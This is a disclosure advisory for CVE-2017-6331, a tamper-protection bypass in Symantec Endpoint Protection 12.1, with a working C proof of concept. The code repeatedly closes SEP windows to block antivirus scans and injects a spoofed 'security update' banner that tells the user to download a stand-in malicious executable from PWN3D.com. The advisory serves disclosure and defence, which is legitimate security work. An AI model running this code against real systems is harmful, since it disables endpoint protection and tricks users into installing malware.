142 lines
No EOL
4 KiB
C
142 lines
No EOL
4 KiB
C
[+] Credits: John Page a.k.a hyp3rlinx
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
|
|
[+] ISR: ApparitionSec
|
|
|
|
|
|
|
|
Vendor:
|
|
=======
|
|
www.symantec.com
|
|
|
|
|
|
|
|
Product:
|
|
===========
|
|
Symantec Endpoint Protection
|
|
v12.1.6 (12.1 RU6 MP5)
|
|
Symantec 12.1.7004.6500
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
===================
|
|
Tamper-Protection Bypass
|
|
Denial Of Service / Message Spoof
|
|
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2017-6331
|
|
SSG16-041
|
|
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
Symantec Endpoint Protection (SEP), does not validate where WinAPI messages comes from (lack of UIPI).
|
|
Therefore, malware can easily spoof messages to the UI or send WM_SYSCOMMAND to close
|
|
the SEP UI denying end user ability to scan / run the EP AntiVirus protection. Spoofed messages could
|
|
also potentially inform a user a scan was clean.
|
|
|
|
Unfortunately Symantecs advisory left out details of the Denial Of Service as well as minimizing the
|
|
amount of text a malware could inject into the UI which would result in compromising the integrity of the
|
|
Symantec Endpoint Protection Control Panel user interface.
|
|
|
|
|
|
References:
|
|
===========
|
|
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20171106_00
|
|
|
|
|
|
|
|
Exploit/POC:
|
|
=============
|
|
|
|
1) Compile below C program, it targets various components of SEP, comment out what you want to send to the UI.
|
|
|
|
2) Try to open the Symantec Endpoint UI and you will be denied.
|
|
3) Or inject attacker supplied messages intructing the user the file is clean etc.
|
|
|
|
|
|
#include <windows.h>
|
|
#include <Tlhelp32.h>
|
|
#define VICTIM "DevViewer.exe"
|
|
|
|
//By HYP3RLINX
|
|
//ISR: ApparitionSec
|
|
//Symantec EP Protection - Tamper Protection Bypass Vulnerability
|
|
//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7
|
|
//How: FindWindow / SendMessage Win32 API
|
|
//Impact: DOS / Integrity Compromised
|
|
//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.
|
|
|
|
void main(void){
|
|
|
|
while(1){
|
|
|
|
HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));
|
|
|
|
if(hWnd!=NULL){
|
|
//This injects arbitrary messages to SEP UI.
|
|
SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***");
|
|
//This prevents a user from being able to run AV scans and renders SEP UI useless
|
|
//SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
|
|
}
|
|
|
|
//HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
|
|
|
|
HWND x = FindWindow(NULL, TEXT("DevViewer"));
|
|
if(x!=NULL){
|
|
SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);
|
|
}
|
|
|
|
HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
|
|
SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0);
|
|
|
|
HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
|
|
SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);
|
|
|
|
HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
|
|
if(x!=NULL){
|
|
SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);
|
|
}
|
|
|
|
sleep(1);
|
|
|
|
}
|
|
}
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Local
|
|
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
Medium
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
=============================
|
|
Vendor Notification: July 8, 2016
|
|
Vendor acknowledged: 7/14/16
|
|
Vendor advisory : November 6, 2017
|
|
November 10, 2017 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c).
|
|
|
|
hyp3rlinx |